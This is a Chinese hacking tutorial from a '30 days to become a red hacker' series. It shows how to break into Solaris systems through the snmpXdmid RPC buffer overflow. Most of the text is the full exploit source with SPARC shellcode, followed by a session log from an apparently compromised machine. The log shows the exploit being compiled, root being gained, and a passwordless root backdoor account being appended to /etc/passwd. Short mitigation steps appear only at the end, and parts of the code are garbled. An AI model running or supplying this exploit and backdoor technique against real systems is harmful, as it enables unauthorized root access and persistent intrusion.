30天打造专业红客
30天打造专业红客『第27天』Sunos(二) \r\n\r\n[ 作者:蓝色 转贴自:基尔网 ]\r\n\r\n接着昨天的,今天,我们来看看Sunos的远程溢出。\r\n\r\n \r\n\r\n本次范例需要的系统及程序情况如下:\r\n\r\n操作系统:Window2000 To Sunos 5.8\r\n\r\n对方操作系统:Sunos 5.8\r\n\r\n程序(一):snmpxdmid.c \r\n\r\n本机IP:127.0.0.1\r\n\r\n测试IP:127.0.0.29\r\n\r\n新程序说明:“snmpxdmid.c”是利用Rpc的snmpxdmid服务写的exploit。\r\n\r\nSolaris snmpXdmid 远程缓冲区溢出漏洞:\r\n\r\nSolaris 2.6/7/8三个版本都携带了一个名为snmpXdmid的RPC服务,这个服务主要用\r\n于在SNMP管理请求和DMI请求之间建立一种映射/转换关系。\r\n\r\n在 UXIX 中,Desktop Management Interface (DMI) 和 SNMP 是两个协调工作的远程管理协议。Sun Microsystems 创建了SNMPxDMID(/usr/lib/dmi/snmpXdmid)映射守护进程来连接这两个协议。此守护进程传输 SNMP 请求给 DMI,但是发现它在处理‘INDICATION’时存在缓冲区溢出问题。本地和远程攻击者利用此漏洞能获得超级用户特权。\r\n\r\n\r\n测试开始:\r\n\r\ntelnet ***.xxx.xxx.xxx\r\n\r\n* telnet上我的肉鸡。\r\n\r\nSunOS 5.8 \r\n\r\nlogin: cnhack\r\nPassword:\r\nLast login: Sun Jul 29 19:37:19 from 127.0.0.1\r\nSun Microsystems Inc. SunOS 5.8 Generic February 2000\r\n$ \r\n\r\n$./usr/man/man5/shell\r\n\r\n#\r\n\r\n* 取得root权限。\r\n\r\n# cat >; snmpxdmid.c\r\n\r\n* 把exploit贴到主机上。\r\n\r\n/*## copyright LAST STAGE OF DELIRIUM mar 2001 poland *://lsd-pl.net/ #*/\r\n/*## snmpXdmid #*/\r\n\r\n/* as the final jump to the assembly code is made to the heap area, this code */\r\n/* also works against machines with non-exec stack protection turned on */\r\n/* due to large data transfers of about 128KB, the code may need some time to */\r\n/* proceed, so be patient */\r\n\r\n#include <sys/types.h>;\r\n#include <sys/socket.h>;\r\n#include <sys/time.h>;\r\n#include <netinet/in.h>;\r\n#include <rpc/rpc.h>;\r\n#include <netdb.h>;\r\n#include <unistd.h>;\r\n#include <stdio.h>;\r\n#include <errno.h>;\r\n\r\n#define SNMPXDMID_PROG 100249\r\n#define SNMPXDMID_VERS 0x1\r\n#define SNMPXDMID_ADDCOMPONENT 0x101\r\n\r\nchar findsckcode[]=\r\n\"\\x20\\xbf\\xff\\xff\" /* bn,a <findsckcode-4>; */\r\n\"\\x20\\xbf\\xff\\xff\" /* bn,a <findsckcode>; */\r\n\"\\x7f\\xff\\xff\\xff\" /* call <findsckcode+4>; */\r\n\"\\x33\\x02\\x12\\x34\"\r\n\"\\xa0\\x10\\x20\\xff\" /* mov 0xff,%l0 
*/\r\n\"\\xa2\\x10\\x20\\x54\" /* mov 0x54,%l1 */\r\n\"\\xa4\\x03\\xff\\xd0\" /* add %o7,-48,%l2 */\r\n\"\\xaa\\x03\\xe0\\x28\" /* add %o7,40,%l5 */\r\n\"\\x81\\xc5\\x60\\x08\" /* jmp %l5+8 */\r\n\"\\xc0\\x2b\\xe0\\x04\" /* stb %g0,[%o7+4] */\r\n\"\\xe6\\x03\\xff\\xd0\" /* ld [%o7-48],%l3 */\r\n\"\\xe8\\x03\\xe0\\x04\" /* ld [%o7+4],%l4 */\r\n\"\\xa8\\xa4\\xc0\\x14\" /* subcc %l3,%l4,%l4 */\r\n\"\\x02\\xbf\\xff\\xfb\" /* bz <findsckcode+32>; */\r\n\"\\xaa\\x03\\xe0\\x5c\" /* add %o7,92,%l5 */\r\n\"\\xe2\\x23\\xff\\xc4\" /* st %l1,[%o7-60] */\r\n\"\\xe2\\x23\\xff\\xc8\" /* st %l1,[%o7-56] */\r\n\"\\xe4\\x23\\xff\\xcc\" /* st %l2,[%o7-52] */\r\n\"\\x90\\x04\\x20\\x01\" /* add %l0,1,%o0 */\r\n\"\\xa7\\x2c\\x60\\x08\" /* sll %l1,8,%l3 */\r\n\"\\x92\\x14\\xe0\\x91\" /* or %l3,0x91,%o1 */\r\n\"\\x94\\x03\\xff\\xc4\" /* add %o7,-60,%o2 */\r\n\"\\x82\\x10\\x20\\x36\" /* mov 0x36,%g1 */\r\n\"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n\"\\x1a\\xbf\\xff\\xf1\" /* bcc <findsckcode+36>; */\r\n\"\\xa0\\xa4\\x20\\x01\" /* deccc %l0 */\r\n\"\\x12\\xbf\\xff\\xf5\" /* bne <findsckcode+60>; */\r\n\"\\xa6\\x10\\x20\\x03\" /* mov 0x03,%l3 */\r\n\"\\x90\\x04\\x20\\x02\" /* add %l0,2,%o0 */\r\n\"\\x92\\x10\\x20\\x09\" /* mov 0x09,%o1 */\r\n\"\\x94\\x04\\xff\\xff\" /* add %l3,-1,%o2 */\r\n\"\\x82\\x10\\x20\\x3e\" /* mov 0x3e,%g1 */\r\n\"\\xa6\\x84\\xff\\xff\" /* addcc %l3,-1,%l3 */\r\n\"\\x12\\xbf\\xff\\xfb\" /* bne <findsckcode+112>; */\r\n\"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n;\r\n\r\nchar shellcode[]=\r\n\"\\x20\\xbf\\xff\\xff\" /* bn,a <shellcode-4>; */\r\n\"\\x20\\xbf\\xff\\xff\" /* bn,a <shellcode>; */\r\n\"\\x7f\\xff\\xff\\xff\" /* call <shellcode+4>; */\r\n\"\\x90\\x03\\xe0\\x20\" /* add %o7,32,%o0 */\r\n\"\\x92\\x02\\x20\\x10\" /* add %o0,16,%o1 */\r\n\"\\xc0\\x22\\x20\\x08\" /* st %g0,[%o0+8] */\r\n\"\\xd0\\x22\\x20\\x10\" /* st %o0,[%o0+16] */\r\n\"\\xc0\\x22\\x20\\x14\" /* st %g0,[%o0+20] */\r\n\"\\x82\\x10\\x20\\x0b\" /* mov 0x0b,%g1 */\r\n\"\\x91\\xd0\\x20\\x08\" /* ta 8 
*/\r\n\"/bin/ksh\"\r\n;\r\n\r\nstatic char nop[]=\"\\x80\\x1c\\x40\\x11\";\r\n\r\ntypedef struct{\r\nstruct{unsigned int len;char *val;}name;\r\nstruct{unsigned int len;char *val;}pragma;\r\n}req_t;\r\n\r\nbool_t xdr_req(XDR *xdrs,req_t *objp){\r\nchar *v=NULL;unsigned long l=0;int b=1;\r\nif(!xdr_u_long(xdrs,&l)) return(FALSE);\r\nif(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);\r\nif(!xdr_bool(xdrs,&b)) return(FALSE);\r\nif(!xdr_u_long(xdrs,&l)) return(FALSE);\r\nif(!xdr_bool(xdrs,&b)) return(FALSE);\r\nif(!xdr_array(xdrs,&objp->;name.val,&objp->;name.len,~0,sizeof(char),\r\n(xdrproc_t)xdr_char)) return(FALSE);\r\nif(!xdr_bool(xdrs,&b)) return(FALSE);\r\nif(!xdr_array(xdrs,&objp->;pragma.val,&objp->;pragma.len,~0,sizeof(char),\r\n(xdrproc_t)xdr_char)) return(FALSE);\r\nif(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);\r\nif(!xdr_u_long(xdrs,&l)) return(FALSE);\r\nreturn(TRUE);\r\n}\r\n\r\nmain(int argc,char **argv){\r\nchar buffer[140000],address[4],pch[4],*b;\r\nint i,c,n,vers=-1,port=0,sck;\r\nCLIENT *cl;enum clnt_stat stat;\r\nstruct hostent *hp;\r\nstruct sockaddr_in adr;\r\nstruct timeval tm={10,0};\r\nreq_t req;\r\n\r\nprintf(\"copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/\\n\"\r\nprintf(\"snmpXdmid for solaris 2.7 2.8 sparc\\n\\n\"\r\n\r\nif(argc<2){\r\nprintf(\"usage: %s address [-p port] -v 7|8\\n\",argv[0]);\r\nexit(-1);\r\n}\r\n\r\nwhile((c=getopt(argc-1,&argv[1],\"p:v:\")!=-1){\r\nswitch(c){\r\ncase \'p\': port=atoi(optarg);break;\r\ncase \'v\': vers=atoi(optarg);\r\n}\r\n}\r\nswitch(vers){\r\ncase 7: *(unsigned int*)address=0x000b1868;break;\r\ncase 8: *(unsigned int*)address=0x000cf2c0;break;\r\ndefault: exit(-1);\r\n}\r\n\r\n*(unsigned long*)pch=htonl(*(unsigned int*)address+32000);\r\n*(unsigned long*)address=htonl(*(unsigned int*)address+64000+32000);\r\n\r\nprintf(\"adr=0x%08x timeout=%d \",ntohl(*(unsigned 
long*)address),tm.tv_sec);\r\nfflush(stdout);\r\n\r\nadr.sin_family=AF_INET;\r\nadr.sin_port=htons(port);\r\nif((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){\r\nif((hp=gethostbyname(argv[1]))==NULL){\r\nerrno=EADDRNOTAVAIL;perror(\"error\"exit(-1);\r\n}\r\nmemcpy(&adr.sin_addr.s_addr,hp->;h_addr,4);\r\n}\r\n\r\nsck=RPC_ANYSOCK;\r\nif(!(cl=clnttcp_create(&adr,SNMPXDMID_PROG,SNMPXDMID_VERS,&sck,0,0))){\r\nclnt_pcreateerror(\"error\"exit(-1);\r\n}\r\ncl->;cl_auth=authunix_create(\"localhost\",0,0,0,NULL);\r\n\r\ni=sizeof(struct sockaddr_in);\r\nif(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){\r\nstruct{unsigned int maxlen;unsigned int len;char *buf;}nb;\r\nioctl(sck,((\'S\'<<|2),\"sockmod\"\r\nnb.maxlen=0xffff;\r\nnb.len=sizeof(struct sockaddr_in);;\r\nnb.buf=(char*)&\r\nioctl(sck,((\'T\'<<|144),&nb);\r\n}\r\nn=ntohs(adr.sin_port);\r\nprintf(\"port=%d connected! \",n);fflush(stdout);\r\n\r\nfindsckcode[12+2]=(unsigned char)((n&0xff00)>;>;;\r\nfindsckcode[12+3]=(unsigned char)(n&0xff);\r\n\r\nb=&buffer[0];\r\nfor(i=0;i<1248;i++) *b++=pch[i%4];\r\nfor(i=0;i<352;i++) *b++=address[i%4];\r\n*b=0;\r\n\r\nb=&buffer[10000];\r\nfor(i=0;i<64000;i++) *b++=0;\r\nfor(i=0;i<64000-188;i++) *b++=nop[i%4];\r\nfor(i=0;i<strlen(findsckcode);i++) *b++=findsckcode;\r\nfor(i=0;i<strlen(shellcode);i++) *b++=shellcode;\r\n*b=0;\r\n\r\nreq.name.len=1200+400+4;\r\nreq.name.val=&buffer[0];\r\nreq.pragma.len=128000+4;\r\nreq.pragma.val=&buffer[10000];\r\n\r\nstat=clnt_call(cl,SNMPXDMID_ADDCOMPONENT,xdr_req,&req,xdr_void,NULL,tm);\r\nif(stat==RPC_SUCCESS) {printf(\"\\nerror: not vulnerable\\n\"exit(-1);}\r\nprintf(\"sent!\\n\"\r\n\r\nwrite(sck,\"/bin/uname -a\\n\",14);\r\nwhile(1){\r\nfd_set fds;\r\nFD_ZERO(&fds);\r\nFD_SET(0,&fds);\r\nFD_SET(sck,&fds);\r\nif(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){\r\nint cnt;\r\nchar buf[1024];\r\nif(FD_ISSET(0,&fds)){\r\nif((cnt=read(0,buf,1024))<1){\r\nif(errno==EWOULDBLOCK||errno==EAGAIN) continue;\r\nelse 
break;\r\n}\r\nwrite(sck,buf,cnt);\r\n}\r\nif(FD_ISSET(sck,&fds)){\r\nif((cnt=read(sck,buf,1024))<1){\r\nif(errno==EWOULDBLOCK||errno==EAGAIN) continue;\r\nelse break;\r\n}\r\nwrite(1,buf,cnt);\r\n}\r\n}\r\n}\r\n}\r\n\r\n\r\n\r\n^D\r\n\r\n \r\n\r\n# gcc -o snmpxdmid snmpxdmid.c -lnsl –lsocket\r\n\r\n* 编译exploit。\r\n\r\nsnmp.c: In function `main\':\r\n\r\nsnmp.c:135: warning: assignment makes pointer from integer without a cast\r\n\r\nsnmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type\r\n\r\n# ./snmpxdmid\r\n\r\n* 运行exploit。\r\n\r\ncopyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/\r\n\r\nsnmpXdmid for solaris 2.7 2.8 sparc\r\n\r\nusage: ./snmpxdmid address [-p port] -v 7|8\r\n\r\n#./snmpxdmid 127.0.0.29 –v 8 \r\n\r\n* 溢出。\r\n\r\n* 说明:\r\n\r\n* address:主机IP地址。\r\n\r\n* [-p port]:溢出端口。\r\n\r\n* -v 7|8:solaris 2.7 (Sunos 5.7)或者solaris 2.8(Sunos 5.8)\r\n\r\ncopyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/\r\n\r\nsnmpXdmid for solaris 2.7 2.8 sparc\r\n\r\nadr=0x000c8f68 timeout=30 port=928 connected!\r\n\r\nsent!\r\n\r\nSunOS business 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250\r\n\r\n* 溢出成功。\r\n\r\nid\r\n\r\nuid=0(root) gid=0(root)\r\n\r\n* 取得root权限。\r\n\r\necho \"cnhack::1:0::/:/bin/bash\" >; /etc/passwd\r\n\r\n* 添加一个用户名为cnhack,密码为空的管理员。\r\n\r\ntelnet localhost \r\n\r\n* telnet主机:127.0.0.29\r\n\r\nTrying 127.0.0.1...\r\n\r\nConnected to localhost. Escape character is \'^]\'.\r\n\r\nSunOS 5.8 \r\n\r\nlogin: cnhack\r\nPassword:\r\nLast login: Sun Jul 29 19:37:19 from 127.0.0.1\r\nSun Microsystems Inc. SunOS 5.8 Generic February 2000\r\n$ \r\n\r\n……\r\n\r\n解决方法: \r\n1) 将 /etc/rc .d/S dmi 重命为 /etc/rc .d/K07dmi (此处 代表对应运行级);再执行命令:/etc/init.d/init.dmi stop \r\n2) 保险起见,可改变其用户权限: chmod 000 /usr/lib/dmi/snmpXdmid \r\n\r\n\r\n\r\n\r\n好了,快通知管理员打上补丁吧^_^\r\n\r\n\r\n注意 :以上文章是小铭的一篇文章中的资料\r\n\r\n在此特别谢谢小铭给我们写了这么好的文章 |